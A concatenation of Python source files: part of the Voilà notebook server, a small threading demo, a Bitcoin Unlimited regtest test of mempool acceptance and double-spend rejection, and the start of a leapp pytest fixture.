'shutdown_request'
]
)
jenv_opt = {"autoescape": True} # we might want extra options via cmd line like notebook server
env = jinja2.Environment(loader=jinja2.FileSystemLoader(self.template_paths), extensions=['jinja2.ext.i18n'], **jenv_opt)
nbui = gettext.translation('nbui', localedir=os.path.join(ROOT, 'i18n'), fallback=True)
env.install_gettext_translations(nbui, newstyle=False)
self.contents_manager = LargeFileManager(parent=self)
# we create a config manager that load both the serverconfig and nbconfig (classical notebook)
read_config_path = [os.path.join(p, 'serverconfig') for p in jupyter_config_path()]
read_config_path += [os.path.join(p, 'nbconfig') for p in jupyter_config_path()]
self.config_manager = ConfigManager(parent=self, read_config_path=read_config_path)
# default server_url to base_url
self.server_url = self.server_url or self.base_url
self.app = tornado.web.Application(
base_url=self.base_url,
server_url=self.server_url or self.base_url,
kernel_manager=self.kernel_manager,
kernel_spec_manager=self.kernel_spec_manager,
allow_remote_access=True,
autoreload=self.autoreload,
voila_jinja2_env=env,
jinja2_env=env,
static_path='/',
server_root_dir='/',
contents_manager=self.contents_manager,
config_manager=self.config_manager
)
self.app.settings.update(self.tornado_settings)
handlers = []
handlers.extend([
(url_path_join(self.server_url, r'/api/kernels/%s' % _kernel_id_regex), KernelHandler),
(url_path_join(self.server_url, r'/api/kernels/%s/channels' % _kernel_id_regex), ZMQChannelsHandler),
(
url_path_join(self.server_url, r'/voila/templates/(.*)'),
TemplateStaticFileHandler
),
(
url_path_join(self.server_url, r'/voila/static/(.*)'),
MultiStaticFileHandler,
{
'paths': self.static_paths,
'default_filename': 'index.html'
},
),
])
# Serving notebook extensions
if self.voila_configuration.enable_nbextensions:
handlers.append(
(
url_path_join(self.server_url, r'/voila/nbextensions/(.*)'),
FileFindHandler,
{
'path': self.nbextensions_path,
'no_cache_paths': ['/'], # don't cache anything in nbextensions
},
)
)
handlers.append(
(
url_path_join(self.server_url, r'/voila/files/(.*)'),
WhiteListFileHandler,
{
'whitelist': self.voila_configuration.file_whitelist,
'blacklist': self.voila_configuration.file_blacklist,
'path': self.root_dir,
},
)
)
tree_handler_conf = {
'voila_configuration': self.voila_configuration
}
if self.notebook_path:
handlers.append((
url_path_join(self.server_url, r'/(.*)'),
VoilaHandler,
{
'notebook_path': os.path.relpath(self.notebook_path, self.root_dir),
'template_paths': self.template_paths,
'config': self.config,
'voila_configuration': self.voila_configuration
}
))
else:
self.log.debug('serving directory: %r', self.root_dir)
handlers.extend([
(self.server_url, VoilaTreeHandler, tree_handler_conf),
(url_path_join(self.server_url, r'/voila/tree' + path_regex),
VoilaTreeHandler, tree_handler_conf),
(url_path_join(self.server_url, r'/voila/render/(.*)'),
VoilaHandler,
{
'template_paths': self.template_paths,
'config': self.config,
'voila_configuration': self.voila_configuration
}),
])
self.app.add_handlers('.*$', handlers)
self.listen()
def stop(self):
shutil.rmtree(self.connection_dir)
run_sync(self.kernel_manager.shutdown_all())
def random_ports(self, port, n):
"""Generate a list of n random ports near the given port.
The first 5 ports will be sequential, and the remaining n-5 will be
randomly selected in the range [port-2*n, port+2*n].
"""
for i in range(min(5, n)):
yield port + i
for i in range(n-5):
yield max(1, port + random.randint(-2*n, 2*n))
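    # For example, random_ports(8866, 10) yields 8866..8870 first and then 5
    # ports drawn from [8846, 8886]; listen() below walks this sequence until
    # a bind succeeds or the ports are exhausted.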
def listen(self):
        success = False
        for port in self.random_ports(self.port, self.port_retries+1):
try:
self.app.listen(port)
self.port = port
self.log.info('Voilà is running at:\n%s' % self.display_url)
except socket.error as e:
if e.errno == errno.EADDRINUSE:
self.log.info(_('The port %i is already in use, trying another port.') % port)
continue
elif e.errno in (errno.EACCES, getattr(errno, 'WSAEACCES', errno.EACCES)):
self.log.warning(_("Permission to listen on port %i denied") % port)
continue
else:
raise
else:
self.port = port
success = True
break
if not success:
self.log.critical(_('ERROR: the Voilà server could not be started because '
'no available port could be found.'))
self.exit(1)
if self.open_browser:
self.launch_browser()
self.ioloop = tornado.ioloop.IOLoop.current()
try:
self.ioloop.start()
except KeyboardInterrupt:
self.log.info('Stopping...')
finally:
self.stop()
def launch_browser(self):
try:
browser = webbrowser.get(self.browser or None)
except webbrowser.Error as e:
self.log.warning(_('No web browser found: %s.') % e)
browser = None
if not browser:
return
uri = self.base_url
fd, open_file = tempfile.mkstemp(suffix='.html')
# Write a temporary file to open in the browser
with io.open(fd, 'w', encoding='utf-8') as fh:
# TODO: do we want to have the token?
# if self.token:
# url = url_concat(url, {'token': self.token})
url = url_path_join(self.connection_url, uri)
jinja2_env = self.app.settings['jinja2_env']
template = jinja2_env.get_template('browser-open.html')
fh.write(template.render(open_url=url, base_url=url))
def target():
return browser.open(urljoin('file:', pathname2url(open_file)), new=self.webbrowser_open_new)
threading.Thread(target=target).start()
main = Voila.launch_instance
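
# A minimal programmatic launch sketch, equivalent to running
# `voila example.ipynb --port=8866 --no-browser` on the command line
# (the notebook filename here is hypothetical):
if __name__ == '__main__':
    main(argv=['example.ipynb', '--port=8866', '--no-browser'])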
|
thread_test1.py
|
"""
# @Time : 2020/8/2
# @Author : Jimou Chen
"""
import time
import threading
def sing():
for i in range(3):
print('singing ...')
time.sleep(1)
def dance():
for i in range(3):
print('dancing ...')
time.sleep(1)
if __name__ == '__main__':
    # Create the threads
sing_thread = threading.Thread(target=sing)
dance_thread = threading.Thread(target=dance)
    # Start the threads
sing_thread.start()
dance_thread.start()
sing_thread.join()
dance_thread.join()
|
mempool_accept.py
|
#!/usr/bin/env python3
# Copyright (c) 2018 The Bitcoin Unlimited developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
import test_framework.loginit
# This test exercises the mempool acceptance data path.
from threading import Thread
import time
import subprocess
import sys
if sys.version_info[0] < 3:
raise "Use Python 3"
import logging
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
from test_framework.blocktools import *
import test_framework.cashlib as cashlib
from test_framework.nodemessages import *
from test_framework.script import *
BitcoinCli = "bitcoin-cli" # Will be amended with the path during initialization
class PayDest:
"""A payment destination. All the info you need to send a payment here and make a subsequent payment
from this address"""
def __init__(self, node=None):
"""Pass a node to use an address from that node's wallet. Pass None to generate a local address"""
if node is None:
self.privkey = cashlib.randombytes(32)
else:
addr = node.getnewaddress()
privb58 = node.dumpprivkey(addr)
self.privkey = decodeBase58(privb58)[1:-5]
self.pubkey = cashlib.pubkey(self.privkey)
self.hash = cashlib.addrbin(self.pubkey)
def __str__(self):
return "priv:%s pub:%s hash:%s" % (hexlify(self.privkey), hexlify(self.pubkey), hexlify(self.hash))
def createConflictingTx(dests, source, count, fee=1):
""" Create "count" conflicting transactions that spend the "source" to "dests" evenly. Conflicting tx are created
by varying the fee. Change the base "fee" if you want which is actually the fee PER dest.
source: a dictionary in RPC listunspent format, with additional "privkey" field which is the private key in bytes
dests: a list of PayDest objects.
count: the number of conflicting tx to return
fee: what to deduct as the fee (in Satoshi)
"""
generatedTx = []
hexOP_DUP = OP_DUP.toHex()
binOP_DUP = ord(OP_DUP.toBin())
for c in range(count):
w = source
if 1:
tx = CTransaction()
tx.vin.append(CTxIn(COutPoint(w["txid"], w["vout"]), b"", 0xffffffff))
amt = int(w["satoshi"] / len(dests)) - (fee + c) # really total fee ends up fee*dest
i = 0
for d in dests:
script = CScript([OP_DUP, OP_HASH160, d.hash, OP_EQUALVERIFY, OP_CHECKSIG])
tx.vout.append(CTxOut(amt, script))
i += 1
sighashtype = 0x41
sig = cashlib.signTxInput(tx, 0, w["satoshi"], w["scriptPubKey"], w["privkey"], sighashtype)
# construct the signature script -- it may be one of 2 types
if w["scriptPubKey"][0:2] == hexOP_DUP or w["scriptPubKey"][0] == binOP_DUP: # P2PKH starts with OP_DUP
tx.vin[0].scriptSig = cashlib.spendscript(sig, w["pubkey"]) # P2PKH
else:
tx.vin[0].scriptSig = cashlib.spendscript(sig) # P2PK
generatedTx.append(tx)
return generatedTx
def createTx(dests, sources, node, maxx=None, fee=1, nextWallet=None, generatedTx=None):
""" Create "maxx" transactions that spend from individual "sources" to every "dests" evenly (many fan-out
transactions). If "generatedTx" is a list the created transactions are put into it. Otherwise they are
sent to "node". If "nextWallet" is a list the outputs of all these created tx are put into it in a format
compatible with "sources" (you can use nextWallet as the sources input in a subsequent call to this function).
Change the base "fee" if you want which is actually the fee PER dest.
sources: list of dictionaries in RPC listunspent format, with optional additional "privkey" field which
is the private key in bytes. If "privkey" does not exist, "node" is asked for it.
dests: a list of PayDest objects.
fee: what to deduct as the fee (in Satoshi)
nextWallet: [output] pass an empty list to get a valid wallet if all the createdTx are committed.
generatedTx: [output] pass an empty list to skip submitting the tx to node, and instead return them in this list.
returns the number of transactions created.
"""
hexOP_DUP = OP_DUP.toHex()
binOP_DUP = ord(OP_DUP.toBin())
count = 0
for w in sources:
nextOuts = []
        if maxx is not None and count == maxx:
break
# if sources is from a bitcoind wallet, I need to grab some info in order to sign
if not "privkey" in w:
privb58 = node.dumpprivkey(w["address"])
privkey = decodeBase58(privb58)[1:-5]
pubkey = cashlib.pubkey(privkey)
w["privkey"] = privkey
w["pubkey"] = pubkey
tx = CTransaction()
tx.vin.append(CTxIn(COutPoint(w["txid"], w["vout"]), b"", 0xffffffff))
amt = int(w["satoshi"] / len(dests)) - fee # really fee ends up fee*dest
i = 0
for d in dests:
script = CScript([OP_DUP, OP_HASH160, d.hash, OP_EQUALVERIFY, OP_CHECKSIG])
tx.vout.append(CTxOut(amt, script))
nextOuts.append({"vout": i, "privkey": d.privkey, "scriptPubKey": script,
"satoshi": amt, "pubkey": d.pubkey})
i += 1
sighashtype = 0x41
n = 0
# print("amountin: %d amountout: %d outscript: %s" % (w["satoshi"], amt, w["scriptPubKey"]))
sig = cashlib.signTxInput(tx, n, w["satoshi"], w["scriptPubKey"], w["privkey"], sighashtype)
if w["scriptPubKey"][0:2] == hexOP_DUP or w["scriptPubKey"][0] == binOP_DUP: # P2PKH starts with OP_DUP
tx.vin[n].scriptSig = cashlib.spendscript(sig, w["pubkey"]) # P2PKH
else:
tx.vin[n].scriptSig = cashlib.spendscript(sig) # P2PK
        if not isinstance(generatedTx, list):  # submit these tx to the node
txhex = hexlify(tx.serialize()).decode("utf-8")
txid = None
try:
txid = node.sendrawtransaction(txhex)
except JSONRPCException as e:
logging.error("TX submission failed because %s" % str(e))
logging.error("tx was: %s" % txhex)
logging.error("amountin: %d amountout: %d outscript: %s" % (w["satoshi"], amt, w["scriptPubKey"]))
raise
else: # return them in generatedTx
generatedTx.append(tx)
for out in nextOuts:
tx.rehash()
out["txid"] = tx.hash
# I've already filled nextOuts with all the other needed fields
        if isinstance(nextWallet, list):
nextWallet += nextOuts
count += 1
return count
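# Sketch of the fan-out pattern used by the tests below: fund a set of PayDest
# outputs from the node's wallet, then chain the returned outputs ("nextWallet")
# into a subsequent call, e.g.:
#   wallet2, gtx2 = [], []
#   createTx(dests, node.listunspent(), node, maxx=50, fee=1,
#            nextWallet=wallet2, generatedTx=gtx2)
#   createTx(dests, wallet2, node, maxx=50)  # spends the outputs just created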
class MyTest (BitcoinTestFramework):
def __init__(self, bigTest=0):
self.bigTest = bigTest
BitcoinTestFramework.__init__(self)
def setup_chain(self, bitcoinConfDict=None, wallets=None):
logging.info("Initializing test directory " + self.options.tmpdir)
initialize_chain(self.options.tmpdir, bitcoinConfDict, wallets)
def setup_network(self, split=False):
self.nodes = start_nodes(2, self.options.tmpdir, [["-rpcworkqueue=100"], ["-rpcworkqueue=100"]])
# Now interconnect the nodes
connect_nodes_bi(self.nodes, 0, 1)
self.is_network_split = False
self.sync_all()
def threadedCreateTx(self, dests, sources, nodeIdx, maxx=None):
"""Create a bunch of transactions using multiple python threads"""
NUMTHREADS = 4
if sources is None:
wallets = self.nodes[nodeIdx].listunspent()
else:
wallets = sources
total = min(len(wallets), maxx)
logging.info("creating %d tx desired %d" % (total, maxx))
wchunks = []
count = 0
for i in range(NUMTHREADS - 1):
start = count
count += int(total / NUMTHREADS)
wchunks.append(wallets[start: count])
wchunks.append(wallets[count:])
threads = []
outputs = []
txPerThread = int(total / NUMTHREADS)
for i in range(NUMTHREADS - 1):
node = get_rpc_proxy(self.nodes[nodeIdx].url, nodeIdx, timeout=30)
t = Thread(target=createTx, args=(dests, wchunks[i], node, txPerThread, 1, outputs))
t.start()
threads.append(t)
createTx(dests, wchunks[NUMTHREADS - 1], self.nodes[nodeIdx],
total - (txPerThread * (NUMTHREADS - 1)), 1, outputs)
for t in threads:
t.join()
return (total, outputs)
def conflictTest(self, dests0, dests1, wallet, numNodes=2):
"""Tests issuing a bunch of conflicting transactions. Expects that you give it a wallet with lots of free UTXO, and nothing in the mempool
"""
logging.info("conflict test")
assert(self.nodes[0].getmempoolinfo()["size"] == 0) # Expects a clean mempool
if 1: # test many conflicts
NTX = 50
i = 0
for c in range(NTX):
source = wallet.pop()
txs = createConflictingTx(dests0, source, c)
for t in txs:
n = self.nodes[i % len(self.nodes)]
n.enqueuerawtransaction(t.toHex())
i += 1
for n in self.nodes:
waitFor(30, lambda: True if n.getmempoolinfo()["size"] >= NTX - 5 else None)
# we have to allow < because bloom filter false positives in the node's
# sending logic may cause it to not get an INV
time.sleep(1)
for n in self.nodes:
assert(n.getmempoolinfo()["size"] <= NTX) # if its > then a doublespend got through
self.commitMempool() # clear out this test
if 1: # test 2 conflicting transactions
NTX = 25
wallet2 = []
gtx2 = []
amt = createTx(dests0, wallet[0:NTX], 1, NTX, 1, wallet2, gtx2)
wallet3 = []
gtx3 = []
# create conflicting tx with slightly different payment amounts
amt = createTx(dests0, wallet[0:NTX], 1, NTX, 2, wallet3, gtx3)
            # Send two double spending transactions using a subprocess. This checks that sendrawtransaction
# does not allow double spends into the mempool when multiple threads are sending transactions.
            conflict_count = 0
rpc_u, rpc_p = rpc_auth_pair(0)
gtx = zip(gtx2, gtx3)
for g in gtx:
# send first tx
# if datadir is not provided, it assumes ~/.bitcoin so this code may sort of work if you
# happen to have a ~/.bitcoin since relevant parameters are overloaded. But that's ugly,
# so supply datadir correctly.
p1 = subprocess.Popen([BitcoinCli, "-datadir=" + self.options.tmpdir + os.sep + "node0", "-rpcconnect=127.0.0.1", "-rpcport=" + str(rpc_port(0)), "-rpcuser=" + rpc_u, "-rpcpassword=" + rpc_p, "sendrawtransaction", g[0].toHex()], universal_newlines=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# send double spend
p2 = subprocess.Popen([BitcoinCli, "-datadir=" + self.options.tmpdir + os.sep + "node0", "-rpcconnect=127.0.0.1", "-rpcport=" + str(rpc_port(0)), "-rpcuser=" + rpc_u, "-rpcpassword=" + rpc_p, "sendrawtransaction", g[1].toHex()], universal_newlines=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout_data1, stderr_data1 = p1.communicate(timeout=5)
stdout_data2, stderr_data2 = p2.communicate(timeout=5)
                if (stderr_data1.find("txn-mempool-conflict") >= 0):
                    conflict_count += 1
                if (stderr_data2.find("txn-mempool-conflict") >= 0):
                    conflict_count += 1
waitFor(1, lambda: True if conflict_count == NTX else print("num conflicts found:" + str(conflict_count) + ", node0 mempool size:" + str(self.nodes[0].getmempoolinfo()["size"]) + ", node1 mempool size:" + str(self.nodes[1].getmempoolinfo()["size"])))
waitFor(30, lambda: True if self.nodes[0].getmempoolinfo()["size"] == NTX else None)
waitFor(30, lambda: True if self.nodes[1].getmempoolinfo()["size"] == NTX else None)
# forget about the tx I used above
wallet = wallet[NTX:]
NTX1 = NTX
# test conflicting tx sent to different nodes
NTX = 50
wallet2 = []
gtx2 = []
amt = createTx(dests0, wallet[0:NTX], 1, NTX, 1, wallet2, gtx2)
wallet3 = []
gtx3 = []
# create conflicting tx with slightly different payment amounts
amt = createTx(dests0, wallet[0:NTX], 1, NTX, 2, wallet3, gtx3)
gtx = zip(gtx2, gtx3)
count = 0
mempools = [x.getmempoolinfo() for x in self.nodes]
for g in gtx:
count += 1
self.nodes[count % numNodes].enqueuerawtransaction(g[0].toHex())
try:
self.nodes[(count + 1) % numNodes].enqueuerawtransaction(g[1].toHex())
except JSONRPCException as e:
if e.error["code"] != -26 or e.error["code"] == -26: # txn-mempool-conflict
pass # we may get an error or not depending on propagation speed of 1st tx
        # There is no good way to tell when the mempool sync process has fully
        # completed, because outside of testing the process of accepting tx never
        # really finishes, so sleep a little while before checking.
time.sleep(2) #wait for all txns to propagate
waitFor(30, lambda: True if self.nodes[0].getmempoolinfo()["size"] == NTX + NTX1 else None)
waitFor(30, lambda: True if self.nodes[1].getmempoolinfo()["size"] == NTX + NTX1 else None)
# forget about the tx I used
wallet = wallet[NTX:]
logging.info("conflict test done")
def commitMempool(self):
"""Commit all the tx in mempools on all nodes into blocks"""
for n in self.nodes:
while n.getmempoolinfo()["size"] != 0:
n.generate(1)
self.sync_blocks()
def removeTxPersistFiles(self):
for d in ["node%d" % x for x in range(1,5)]:
fname = self.options.tmpdir + os.sep + d + os.sep + "regtest" + os.sep + "mempool.dat"
if os.path.exists(fname):
os.remove(fname)
fname = self.options.tmpdir + os.sep + d + os.sep + "regtest" + os.sep + "orphanpool.dat"
if os.path.exists(fname):
os.remove(fname)
def run_test(self):
decContext = decimal.getcontext().prec
decimal.getcontext().prec = 8 + 8 # 8 digits to get to 21million, and each bitcoin is 100 million satoshis
self.nodes[0].generate(152)
self.sync_blocks()
# Get some addresses
dests1 = [PayDest(self.nodes[1]) for x in range(20)]
dests0 = [PayDest(self.nodes[0]) for x in range(20)]
        # Create 51 transactions and ensure that they get synced
NTX = 51
(amt, wallet) = self.threadedCreateTx(dests1, None, 0, NTX)
assert(amt == NTX)
waitFor(10, lambda: True if self.nodes[0].getmempoolinfo()["size"] >= NTX else None)
mp = waitFor(30, lambda: [x.getmempoolinfo() for x in self.nodes] if amt - self.nodes[1].getmempoolinfo()
["size"] < 5 else None, lambda: "timeout mempool is: " + str([x.getmempoolinfo() for x in self.nodes]))
logging.info(mp)
w0 = wallet[0:500]
wallet = wallet[500:]
self.commitMempool()
self.conflictTest(dests0, dests1, w0)
self.commitMempool()
        # Create 500 transactions and ensure that they get synced
NTX = 500 if self.bigTest else 100
start = time.monotonic()
(amt, wallet) = self.threadedCreateTx(dests0, wallet, 1, NTX)
end = time.monotonic()
logging.info("created %d tx in %s seconds. On node 0. Speed %f tx/sec" %
(amt, end - start, float(amt) / (end - start)))
mp = waitFor(20, lambda: [x.getmempoolinfo() for x in self.nodes] if amt - self.nodes[1].getmempoolinfo()
["size"] < 10 else None, lambda: "timeout mempool is: " + str([x.getmempoolinfo() for x in self.nodes]))
logging.info(mp)
# Create 5000 transactions and ensure that they get synced
if self.bigTest:
self.commitMempool()
NTX = 5000
start = time.monotonic()
(amt, wallet) = self.threadedCreateTx(dests1, wallet, 0, NTX)
end = time.monotonic()
logging.info("created %d tx in %s seconds. On node 0. Speed %f tx/sec" %
(amt, end - start, float(amt) / (end - start)))
mp = waitFor(300, lambda: [x.getmempoolinfo() for x in self.nodes] if amt - self.nodes[1].getmempoolinfo()
["size"] < 20 else None, lambda: "timeout mempool is: " + str([x.getmempoolinfo() for x in self.nodes]))
logging.info(mp)
if self.bigTest:
self.commitMempool()
NTX = 10000
start = time.monotonic()
(amt, wallet) = self.threadedCreateTx(dests0, wallet, 1, NTX)
end = time.monotonic()
logging.info("created %d tx in %s seconds. On node 0. Speed %f tx/sec" %
(amt, end - start, float(amt) / (end - start)))
start = time.monotonic()
mp = waitFor(300, lambda: [x.getmempoolinfo() for x in self.nodes] if amt - self.nodes[0].getmempoolinfo()[
"size"] < 50 else None, lambda: "timeout mempool is: " + str([x.getmempoolinfo() for x in self.nodes]))
end = time.monotonic()
logging.info("synced %d tx in %s seconds. Speed %f tx/sec" %
(amt, end - start, float(amt) / (end - start)))
logging.info(mp)
# Now test pushing all of the mempool tx to other nodes
NTX = self.nodes[0].getmempoolinfo()["size"] # find how many I am pushing
# Start up node 3
self.nodes.append(start_node(2, self.options.tmpdir))
connect_nodes_bi(self.nodes, 0, 2)
sync_blocks(self.nodes)
# Push all tx to node 3 from one node
destName = "127.0.0.1:" + str(p2p_port(2))
start = time.monotonic()
self.nodes[0].pushtx(destName)
mp = waitFor(120, lambda: [x.getmempoolinfo() for x in self.nodes]
if NTX - self.nodes[2].getmempoolinfo()["size"] < 30 else None)
end = time.monotonic()
logging.info("synced %d tx in %s seconds. Speed %f tx/sec" % (NTX, end - start, float(NTX) / (end - start)))
# Regression test the stats now. Ideally this would be in an isolated test, but this can be done here quickly
# and Travis runs out of time often.
for n in self.nodes:
result = n.getstatlist()
# logging.info(result)
result = n.getstat("memPool/txAdded", "sec10", 100)
logging.info(result)
result = n.getstat("memPool/size", "min5")
logging.info(result)
result = n.getstat("net/recv/msg/inv", "sec10", 20)
logging.info(result)
result = n.getstat("net/recv/total", "sec10", 20)
logging.info(result)
result = n.getstat("net/send/total", "sec10")
logging.info(result)
if self.bigTest:
# Start up node 4
self.nodes.append(start_node(3, self.options.tmpdir))
connect_nodes_bi(self.nodes, 0, 3)
connect_nodes_bi(self.nodes, 1, 3)
connect_nodes_bi(self.nodes, 2, 3)
sync_blocks(self.nodes)
# Push all tx to node 4 from many nodes
destName = "127.0.0.1:" + str(p2p_port(3))
start = time.monotonic()
self.nodes[0].pushtx(destName)
self.nodes[1].pushtx(destName)
self.nodes[2].pushtx(destName)
# Large mempool sync if running in debug mode (with periodic mempool checking) will be very slow
mp = waitFor(300, lambda: [x.getmempoolinfo() for x in self.nodes]
if NTX - self.nodes[3].getmempoolinfo()["size"] < 30 else print ([x.getmempoolinfo()["size"] for x in self.nodes]))
end = time.monotonic()
logging.info("synced %d tx in %s seconds. Speed %f tx/sec" % (NTX, end - start, float(NTX) / (end - start)))
# Stop and start 4 nodes with different minlimitertxfee's. Then send transactions with varying
# fees and see if they propagated correctly.
self.nodes[0].generate(1) # clean up
self.sync_blocks()
logging.info("starting mempool limiting tests")
stop_nodes(self.nodes)
wait_bitcoinds()
self.removeTxPersistFiles()
self.nodes = start_nodes(4, self.options.tmpdir, [["-minlimitertxfee=1.0", "-limitfreerelay=0"], ["-minlimitertxfee=2.0", "-limitfreerelay=0"], ["-minlimitertxfee=3.5", "-limitfreerelay=0"], ["-minlimitertxfee=0.0", "-limitfreerelay=0"]])
# Now interconnect the nodes
interconnect_nodes(self.nodes)
self.sync_blocks()
txId = self.nodes[0].sendtoaddress(self.nodes[0].getnewaddress(), "1e-4")
waitFor(20, lambda: txId in self.nodes[0].getrawmempool())
waitFor(20, lambda: txId in self.nodes[3].getrawmempool())
try:
txObj1 = self.nodes[0].getmempoolentry(txId)
except JSONRPCException as e:
assert("txn failed to enter mempool: " + str(e.error["message"]))
try:
txObj2 = self.nodes[1].getmempoolentry(txId)
assert 0 # should have failed
except JSONRPCException as e:
assert e.error["message"] == 'Transaction not in mempool'
try:
txObj3 = self.nodes[2].getmempoolentry(txId)
assert 0 # should have failed
except JSONRPCException as e:
assert e.error["message"] == 'Transaction not in mempool'
try:
txObj4 = self.nodes[3].getmempoolentry(txId)
except JSONRPCException as e:
assert("txn failed to enter mempool: " + str(e.error["message"]))
txId = self.nodes[1].sendtoaddress(self.nodes[0].getnewaddress(), "1e-4")
waitFor(20, lambda: txId in self.nodes[0].getrawmempool())
waitFor(20, lambda: txId in self.nodes[1].getrawmempool())
waitFor(20, lambda: txId in self.nodes[3].getrawmempool())
try:
txObj1 = self.nodes[0].getmempoolentry(txId)
except JSONRPCException as e:
assert("txn failed to enter mempool: " + str(e.error["message"]))
try:
txObj2 = self.nodes[1].getmempoolentry(txId)
except JSONRPCException as e:
assert("txn failed to enter mempool: " + str(e.error["message"]))
try:
txObj3 = self.nodes[2].getmempoolentry(txId)
assert 0 # should have failed
except JSONRPCException as e:
assert e.error["message"] == 'Transaction not in mempool'
try:
txObj4 = self.nodes[3].getmempoolentry(txId)
except JSONRPCException as e:
assert("txn failed to enter mempool: " + str(e.error["message"]))
self.nodes[3].set("minlimitertxfee=5")
txId = self.nodes[2].sendtoaddress(self.nodes[0].getnewaddress(), "1e-4")
waitFor(20, lambda: txId in self.nodes[0].getrawmempool())
waitFor(20, lambda: txId in self.nodes[1].getrawmempool())
waitFor(20, lambda: txId in self.nodes[2].getrawmempool())
try:
txObj1 = self.nodes[0].getmempoolentry(txId)
except JSONRPCException as e:
assert("txn failed to enter mempool: " + str(e.error["message"]))
try:
txObj2 = self.nodes[1].getmempoolentry(txId)
except JSONRPCException as e:
assert("txn failed to enter mempool: " + str(e.error["message"]))
try:
txObj3 = self.nodes[2].getmempoolentry(txId)
except JSONRPCException as e:
assert("txn failed to enter mempool: " + str(e.error["message"]))
try:
txObj4 = self.nodes[3].getmempoolentry(txId)
assert 0 # should have failed
except JSONRPCException as e:
assert e.error["message"] == 'Transaction not in mempool'
# Stop and start 4 nodes with different limitfreerelay's. Then send transactions with varying
# fees and see if they propagated correctly.
stop_nodes(self.nodes)
wait_bitcoinds()
self.removeTxPersistFiles()
self.nodes = start_nodes(4, self.options.tmpdir, [["-minlimitertxfee=0.0", "-limitfreerelay=0"], ["-minlimitertxfee=1.0", "-limitfreerelay=1"], ["-minlimitertxfee=2.0", "-limitfreerelay=1"], ["-minlimitertxfee=3.0", "-limitfreerelay=2"]])
#clear all mempools by mining a block
interconnect_nodes(self.nodes)
self.nodes[0].generate(1)
self.sync_blocks()
for i in range(100):
self.nodes[0].sendtoaddress(self.nodes[0].getnewaddress(), "1e-4")
        # check all mempools. Nodes 2 and 3 will have had free transactions rate limited, with node 2 having
        # only a max of 10K bytes in the pool and node 3 up to 20K bytes in the pool, whereas nodes 0 and 1 will
        # have allowed all transactions into their mempools.
waitFor(30, lambda: self.nodes[0].getmempoolinfo()["size"] == 100)
waitFor(30, lambda: self.nodes[0].getmempoolinfo()["bytes"] > 20000)
waitFor(30, lambda: self.nodes[1].getmempoolinfo()["size"] == 100)
waitFor(30, lambda: self.nodes[1].getmempoolinfo()["bytes"] > 20000)
waitFor(30, lambda: (self.nodes[2].getmempoolinfo()["size"] >= 43) and (self.nodes[2].getmempoolinfo()["size"] <= 45))
waitFor(30, lambda: self.nodes[2].getmempoolinfo()["bytes"] < 11000)
waitFor(30, lambda: self.nodes[2].getmempoolinfo()["bytes"] > 9750)
waitFor(30, lambda: [print("Node 3 mempool, expecting 87: %s" % str(self.nodes[3].getmempoolinfo())), (self.nodes[3].getmempoolinfo()["size"] >= 86) and (self.nodes[3].getmempoolinfo()["size"] <= 90)][-1])
waitFor(30, lambda: self.nodes[3].getmempoolinfo()["bytes"] < 22000)
waitFor(30, lambda: self.nodes[3].getmempoolinfo()["bytes"] > 19500)
# stop and start all nodes with mempool persist off and limitfreerelay off but increase the minlimitertxfee to a high
# value. This will test the forced reaccepting of wallet transactions even though free transactions are not accepted.
# Only the node which had txns sent to its wallet should have its txns reaccepted.
stop_nodes(self.nodes)
wait_bitcoinds()
self.nodes = start_nodes(4, self.options.tmpdir, [["-minlimitertxfee=10.0", "-limitfreerelay=0", "-persistmempool=0"], ["-minlimitertxfee=1.0", "-limitfreerelay=0", "-persistmempool=0"], ["-minlimitertxfee=2.0", "-limitfreerelay=0", "-persistmempool=0"], ["-minlimitertxfee=3.0", "-limitfreerelay=0", "-persistmempool=0"]])
interconnect_nodes(self.nodes)
waitFor(30, lambda: self.nodes[0].getmempoolinfo()["size"] == 100)
waitFor(30, lambda: self.nodes[0].getmempoolinfo()["bytes"] > 20000)
waitFor(30, lambda: self.nodes[1].getmempoolinfo()["size"] == 0)
waitFor(30, lambda: self.nodes[1].getmempoolinfo()["bytes"] == 0)
waitFor(30, lambda: self.nodes[2].getmempoolinfo()["size"] == 0)
waitFor(30, lambda: self.nodes[2].getmempoolinfo()["bytes"] == 0)
waitFor(30, lambda: self.nodes[3].getmempoolinfo()["size"] == 0)
waitFor(30, lambda: self.nodes[3].getmempoolinfo()["bytes"] == 0)
if __name__ == '__main__':
env = os.getenv("BITCOIND", None)
path = None
if env is None:
for arg in sys.argv:
if "srcdir" in arg:
path = arg.split("=")[1]
break
if path is None:
env = os.path.dirname(os.path.abspath(__file__))
env = env + os.sep + ".." + os.sep + ".." + os.sep + "src" + os.sep + "bitcoind"
env = os.path.abspath(env)
if path is None:
path = os.path.dirname(env)
try:
cashlib.init(path + os.sep + ".libs" + os.sep + "libbitcoincash.so")
BitcoinCli = os.getenv("BITCOINCLI", path + os.sep + "bitcoin-cli")
MyTest().main()
except OSError as e:
print("Issue loading shared library. This is expected during cross compilation since the native python will not load the .so: %s" % str(e))
# Create a convenient function for an interactive python debugging session
def Test():
global BitcoinCli
t = MyTest(True)
t.drop_to_pdb = True
bitcoinConf = {
"debug": ["blk", "mempool", "net", "req"],
"blockprioritysize": 2000000, # we don't want any transactions rejected due to insufficient fees...
"net.ignoreTimeouts": 1,
"logtimemicros": 1
}
# you may want these flags:
flags = ["--nocleanup", "--noshutdown"]
# Execution is much faster if a ramdisk is used, so use it if one exists in a typical location
if os.path.isdir("/ramdisk/test"):
flags.append("--tmpdir=/ramdisk/test/ma")
    # Out-of-source builds are awkward to start because they need an additional flag;
    # automatically add this flag during testing for common out-of-source locations
binpath = findBitcoind()
flags.append("--srcdir=%s" % binpath)
# load the cashlib.so from our build directory
cashlib.init(binpath + os.sep + ".libs" + os.sep + "libbitcoincash.so")
BitcoinCli = os.getenv("BITCOINCLI", binpath + os.sep + "bitcoin-cli")
# start the test
t.main(flags, bitcoinConf, None)
|
fixture.py
|
import os
import socket
import sys
import types
import uuid
from multiprocessing import Process, Queue
import pytest
from _pytest.python import pytest_pyfunc_call as original_pytest_pyfunc_call
from leapp.compat import raise_with_traceback
from leapp.messaging.inprocess import InProcessMessaging
from leapp.repository.scan import find_and_scan_repositories
from leapp.utils import get_api_models
from leapp.utils.audit import Execution, get_connection
